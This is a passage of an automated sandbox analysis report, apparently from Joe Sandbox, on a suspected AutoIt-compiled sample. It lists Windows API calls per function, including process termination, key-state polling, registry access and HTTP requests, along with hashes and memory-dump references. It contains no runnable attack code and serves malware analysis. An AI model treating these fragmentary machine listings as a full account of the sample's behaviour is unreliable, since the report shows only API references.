                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C88BF5
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C88C08
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C88C1B
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C88C2E
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C88C41
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C88C54
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C88C67
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C88C7A
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C88C8D
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C88CA0
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C88CB3
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C88CC6
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C88CD9
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C88CEC
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00C88CFF
                                • __mtinitlocks.LIBCMT ref: 00C887DC
                                  • Part of subcall function 00C88AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00D1AC68,00000FA0,?,?,00C887E1,00C86AFA,00D167D8,00000014), ref: 00C88AD1
                                • __mtterm.LIBCMT ref: 00C887E5
                                  • Part of subcall function 00C8884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C887EA,00C86AFA,00D167D8,00000014), ref: 00C889CF
                                  • Part of subcall function 00C8884D: _free.LIBCMT ref: 00C889D6
                                  • Part of subcall function 00C8884D: DeleteCriticalSection.KERNEL32(00D1AC68,?,?,00C887EA,00C86AFA,00D167D8,00000014), ref: 00C889F8
                                • __calloc_crt.LIBCMT ref: 00C8880A
                                • GetCurrentThreadId.KERNEL32 ref: 00C88833
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                • String ID:
                                • API String ID: 2942034483-0
                                • Opcode ID: 4e80e319c28d53471477567944fb905df575710c333e51894c5a16a15e22f8d3
                                • Instruction ID: 95966eef5b58ddb43b8a3c1a5b5b156d93365a3f20909ca4dc4e747925325f7f
                                • Opcode Fuzzy Hash: 4e80e319c28d53471477567944fb905df575710c333e51894c5a16a15e22f8d3
                                • Instruction Fuzzy Hash: BBF090321597516AE2247B787C0768B27D48F0273CBE04A2AF460D58D2FF10884A67AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 1423608774-0
                                • Opcode ID: e04e7a697ca9174a8babf1ac4e98d5d312f838da41d14c4676c188ab920192bd
                                • Instruction ID: d391a44c2043a2095da0f60da88fd7ff33c5b96d7a7247c0ca8cc51ebd770fcb
                                • Opcode Fuzzy Hash: e04e7a697ca9174a8babf1ac4e98d5d312f838da41d14c4676c188ab920192bd
                                • Instruction Fuzzy Hash: FF01A9321026529BDB156B54ED88FEF7775FF4A7167000529F6039A0B1CB75ED00DB51
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C61898
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C618A0
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C618AB
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C618B6
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C618BE
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C618C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: 251fb315e0266c4fafe66fb333f94d800ba399924932fa43f40b965328245f1b
                                • Instruction ID: 45e3d09caca1eba454c58711ba583ab425bff0513909837d1b85df97def0f039
                                • Opcode Fuzzy Hash: 251fb315e0266c4fafe66fb333f94d800ba399924932fa43f40b965328245f1b
                                • Instruction Fuzzy Hash: BC0167B0902B5ABDE3008F6A8C85B56FFB8FF19354F04411BA15C4BA42C7F5A864CBE5
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CA8504
                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CA851A
                                • GetWindowThreadProcessId.USER32(?,?), ref: 00CA8529
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8538
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8542
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8549
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                • String ID:
                                • API String ID: 839392675-0
                                • Opcode ID: 677d4736c266828701fa282067224d42c50e9fbe895676a81e48324b024e5739
                                • Instruction ID: cbaec1b1e855f314134b345c149eac68074d445a86fa5d6855eea528d0b756ff
                                • Opcode Fuzzy Hash: 677d4736c266828701fa282067224d42c50e9fbe895676a81e48324b024e5739
                                • Instruction Fuzzy Hash: 28F03072640199BFE7215B529D4EFEF7A7CDFC6B15F000058FA0695050D7A06A01D6B5
                                APIs
                                • InterlockedExchange.KERNEL32(?,?), ref: 00CAA330
                                • EnterCriticalSection.KERNEL32(?,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA341
                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA34E
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA35B
                                  • Part of subcall function 00CA9CCE: CloseHandle.KERNEL32(?,?,00CAA368,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CA9CD8
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CAA36E
                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA375
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: 99b3f3a1f64a1ecd736ba14c8dc0136050e91d852224699249c513d660ad2479
                                • Instruction ID: c9602bcd9d6966970bd4f791d1db141a3ea043b5b87d6e5b391c0e0159306c06
                                • Opcode Fuzzy Hash: 99b3f3a1f64a1ecd736ba14c8dc0136050e91d852224699249c513d660ad2479
                                • Instruction Fuzzy Hash: 54F05E32141252ABD7112B64ED88FDF7B79EF8A312B000521F203990B1CBB59D01DB51
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00C6BBD9: _memmove.LIBCMT ref: 00C6BC33
                                • __swprintf.LIBCMT ref: 00C7D98F
                                Strings
                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C7D832
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                • API String ID: 1943609520-557222456
                                • Opcode ID: 75a16370ff8e2df0978c794a6c04487672b5a59de9b6471f1495e146c03a36c6
                                • Instruction ID: a05e7764bdde2e9ad24743c9fc274306b6d6dc3d07e49a2029cd508411d26305
                                • Opcode Fuzzy Hash: 75a16370ff8e2df0978c794a6c04487672b5a59de9b6471f1495e146c03a36c6
                                • Instruction Fuzzy Hash: 29916B31518301AFC724EF24C885D6EB7B4FF95710F10495EF69A972A1EB20EE44EB52
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CBB4A8
                                • CharUpperBuffW.USER32(?,?), ref: 00CBB5B7
                                • VariantClear.OLEAUT32(?), ref: 00CBB73A
                                  • Part of subcall function 00CAA6F6: VariantInit.OLEAUT32(00000000), ref: 00CAA736
                                  • Part of subcall function 00CAA6F6: VariantCopy.OLEAUT32(?,?), ref: 00CAA73F
                                  • Part of subcall function 00CAA6F6: VariantClear.OLEAUT32(?), ref: 00CAA74B
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                • API String ID: 4237274167-1221869570
                                APIs
                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA10B8
                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CA10EE
                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CA10FF
                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CA1181
                                Similarity
                                • API ID: ErrorMode$AddressCreateInstanceProc
                                • String ID: DllGetClassObject
                                • API String ID: 753597075-1075368562
                                APIs
                                • _memset.LIBCMT ref: 00CA5A93
                                • GetMenuItemInfoW.USER32 ref: 00CA5AAF
                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CA5AF5
                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D218F0,00000000), ref: 00CA5B3E
                                Similarity
                                • API ID: Menu$Delete$InfoItem_memset
                                • String ID: 0
                                • API String ID: 1173514356-4108050209
                                APIs
                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00CC0478
                                  • Part of subcall function 00C67F40: _memmove.LIBCMT ref: 00C67F8F
                                  • Part of subcall function 00C6A2FB: _memmove.LIBCMT ref: 00C6A33D
                                Similarity
                                • API ID: _memmove$BuffCharLower
                                • String ID: cdecl$none$stdcall$winapi
                                • API String ID: 2411302734-567219261
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C9C684
                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C9C697
                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C9C6C7
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                Similarity
                                • API ID: MessageSend$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 458670788-1403004172
                                APIs
                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB4A60
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB4A86
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CB4AB6
                                • InternetCloseHandle.WININET(00000000), ref: 00CB4AFD
                                  • Part of subcall function 00CB56A9: GetLastError.KERNEL32(?,?,00CB4A2B,00000000,00000000,00000001), ref: 00CB56BE
                                Similarity
                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                • String ID:
                                • API String ID: 1951874230-3916222277
                                APIs
                                  • Part of subcall function 00C7C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C7C657
                                  • Part of subcall function 00C7C619: GetStockObject.GDI32(00000011), ref: 00C7C66B
                                  • Part of subcall function 00C7C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C7C675
                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC8F69
                                • LoadLibraryW.KERNEL32(?), ref: 00CC8F70
                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC8F85
                                • DestroyWindow.USER32(?), ref: 00CC8F8D
                                Similarity
                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                • String ID: SysAnimate32
                                • API String ID: 4146253029-1011021900
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAE392
                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00CAE3E6
                                • __swprintf.LIBCMT ref: 00CAE3FF
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,00CFDBF0), ref: 00CAE43D
                                Similarity
                                • API ID: ErrorMode$InformationVolume__swprintf
                                • String ID: %lu
                                • API String ID: 3164766367-685833217
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                  • Part of subcall function 00C9D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9D640
                                  • Part of subcall function 00C9D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9D653
                                  • Part of subcall function 00C9D623: GetCurrentThreadId.KERNEL32 ref: 00C9D65A
                                  • Part of subcall function 00C9D623: AttachThreadInput.USER32(00000000), ref: 00C9D661
                                • GetFocus.USER32 ref: 00C9D7FB
                                  • Part of subcall function 00C9D66C: GetParent.USER32(?), ref: 00C9D67A
                                • GetClassNameW.USER32(?,?,00000100), ref: 00C9D844
                                • EnumChildWindows.USER32(?,00C9D8BA), ref: 00C9D86C
                                • __swprintf.LIBCMT ref: 00C9D886
                                Similarity
                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                • String ID: %s%d
                                • API String ID: 1941087503-1110647743
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CC18E4
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CC1917
                                • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CC1A3A
                                • CloseHandle.KERNEL32(?), ref: 00CC1AB0
                                Similarity
                                • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                • String ID:
                                • API String ID: 2364364464-0
                                APIs
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CC05DF
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC066E
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00CC068C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00CC06D2
                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 00CC06EC
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F282
                                  • Part of subcall function 00C7F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CAAEA5,?,?,00000000,00000008), ref: 00C7F2A6
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                • String ID:
                                • API String ID: 327935632-0
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00CC3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC2DE0
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC2E1F
                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CC2E66
                                • RegCloseKey.ADVAPI32(?,?), ref: 00CC2E92
                                • RegCloseKey.ADVAPI32(00000000), ref: 00CC2E9F
                                Similarity
                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                • String ID:
                                • API String ID: 3440857362-0
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00CB17D4
                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CB17FD
                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CB183C
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CB1861
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CB1869
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                • String ID:
                                • API String ID: 1389676194-0
                                • Opcode ID: 5ce92008c15ca67bf8f13652b65a3268455359639bb39abf3e8a4b7ff1ab8305
                                • Instruction ID: cad1ca11214bb4e83617b878b38d9da7fb2c701221bb00b854711ffd956875b6
                                • Opcode Fuzzy Hash: 5ce92008c15ca67bf8f13652b65a3268455359639bb39abf3e8a4b7ff1ab8305
                                • Instruction Fuzzy Hash: BF412935A00205DFCB11EF64C991AADBBF5FF48314B148099E90AAF362DB35ED05DBA0
                                APIs
                                • GetCursorPos.USER32(000000FF), ref: 00C7B749
                                • ScreenToClient.USER32(00000000,000000FF), ref: 00C7B766
                                • GetAsyncKeyState.USER32(00000001), ref: 00C7B78B
                                • GetAsyncKeyState.USER32(00000002), ref: 00C7B799
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorScreen
                                • String ID:
                                • API String ID: 4210589936-0
                                • Opcode ID: 31efc5d05a69d0cafb0dd1db5395ad689d3c217f4552c898db41508b26564d5c
                                • Instruction ID: d2f6dab0b65c43e01f6de79a248c5cfc85d5fe2273087351c4392ee75ddf2ee7
                                • Opcode Fuzzy Hash: 31efc5d05a69d0cafb0dd1db5395ad689d3c217f4552c898db41508b26564d5c
                                • Instruction Fuzzy Hash: 8A415D35504219FFDF19AF65C884FEEBBB4BB45360F10821AF829962D0C730AE54DBA1
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00C9C156
                                • PostMessageW.USER32(?,00000201,00000001), ref: 00C9C200
                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C9C208
                                • PostMessageW.USER32(?,00000202,00000000), ref: 00C9C216
                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C9C21E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessagePostSleep$RectWindow
                                • String ID:
                                • API String ID: 3382505437-0
                                • Opcode ID: 556466a46bcc7cde704ae294285e3eaf1a1ba51db09d6f7b32213b8fa77c0f1a
                                • Instruction ID: de2bf708ee723cd260b0ad8c924c2ac56a84ab7197a07aef04427ceb527aa568
                                • Opcode Fuzzy Hash: 556466a46bcc7cde704ae294285e3eaf1a1ba51db09d6f7b32213b8fa77c0f1a
                                • Instruction Fuzzy Hash: 6431BD71900219EFDF04CFA8DE8DB9E3BB5EB05325F104229F925AB2D1C7B09A54DB90
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00C9E9CD
                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C9E9EA
                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C9EA22
                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9EA48
                                • _wcsstr.LIBCMT ref: 00C9EA52
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                • String ID:
                                • API String ID: 3902887630-0
                                • Opcode ID: 051426af932e53238c0a9300901cebae770c1453e14b8ebcfb4e8b49cbfd3c0d
                                • Instruction ID: 339878f6f3cfeda9ad7938520ad3ad83c0639c2890cecad2be9fafd5bd168770
                                • Opcode Fuzzy Hash: 051426af932e53238c0a9300901cebae770c1453e14b8ebcfb4e8b49cbfd3c0d
                                • Instruction Fuzzy Hash: A821D771604240BAEF15EB6A9C4DE7F7FACEF55764F118029F809CA0A1EE61DD40A350
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCDCC0
                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CCDCE4
                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CCDCFC
                                • GetSystemMetrics.USER32(00000004), ref: 00CCDD24
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00CB407D,00000000), ref: 00CCDD42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
